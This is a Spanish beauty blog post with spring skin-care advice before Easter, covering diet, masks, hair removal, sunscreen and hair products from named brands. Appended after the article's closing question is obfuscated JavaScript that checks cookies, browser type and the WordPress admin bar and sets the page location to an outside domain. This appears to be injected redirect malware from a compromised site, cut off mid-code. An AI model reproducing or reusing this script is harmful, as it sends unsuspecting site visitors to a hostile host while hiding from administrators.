Ya estamos en plena primavera y es normal que en cuanto vemos un rayito de sol nos lancemos a él como si no hubiera un mañana. Pero tenemos que tener cuidado con la cantidad de sol que recibimos y protegernos de él como es debido. ¿Te gustaría preparar tu piel de cara a Semana Santa?

 

No sólo debes cuidarte por fuera

Aunque nos gusta estar bien para nosotros mismos y para los demás, el cuidarse desde dentro es súper importante, y en esta parte, la alimentación juega un papel crucial. Aunque todos lo sabemos, hay que dejar clara la importancia de tomar frutas y verduras, y si queremos coger color más rápidamente, que éstas tengan un alto contenido en betacarotenos. Naranjas, zanahorias o cerezas son buenos ejemplos de ellos, además de que previenen el envejecimiento del organismo. Si crees que necesitas una ayuda extra, las mascarillas también son una buena opción, ya que actúan directamente sobre la piel, dejándola cuidada e hidratada. En este caso, puedes optar por usar la mascarilla peeling perfeccionadora de Dreamskin, que restaura tu piel en un minuto gracias a su efecto de “piel nueva”. Si lo que tienes son signos de fatiga, quizá sea mejor que elijas la combinación de Gel Hidratante + Tratamiento signos de fatiga de Clinique ID, gracias al que podrás crear tu fórmula hidratante a medida.

 

preparalapielsemanasanta

 

Depilación

 Otro apartado importante a tener en cuenta para preparar la piel es la depilación, y es que se debe realizar (sea con cera, depiladora o el método que elijas) unos 4-5 días antes de exponerte al sol, ya que la piel está más sensible tanto a la luz solar como al agua salada del mar.

 

prepararlapiel

 

Protección solar

Ya sabemos la importancia de protegerse del sol. La piel tiene memoria y los excesos pasan factura. Por ello, te recomendamos una protección solar de al menos factor 30. Si quieres protegerte y coger tono más rápido, el aceite solar Clarins Gel In Huile Solaire Invisible UVA/UVB 30 sirve para todo tipo de pieles y nos protege de los efectos nocivos del sol. Para coger tono en la cara, el fluido con color de alta protección antioxidante Clarins Compacto Solaire MIneral UVB30 es una buena opción, ya que se aplica fácilmente en cualquier momento.

 

preparapielsemanasanta

 

Pelo

El más dañado siempre con el buen tiempo es el pelo, y es que no lo protegemos como merece ante los rayos solares y el agua del mar. Es recomendable utilizar un buen champú y acondicionador, además de una crema hidratante para después. Si quieres tenerlo en un mismo pack, te recomendamos el Kit Découverte Disciplinant Hair Rituel de Sisley, que se compone de champú, acondicionador, mascarilla y aceite de cuidado capilar.

 

Diseño sin título (41)

 

Y ahora ya sí estás preparada para disfrutar unos días de sol y buen tiempo. ¿Tienes algún consejo para cuidarte tanto por dentro como por fuera? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone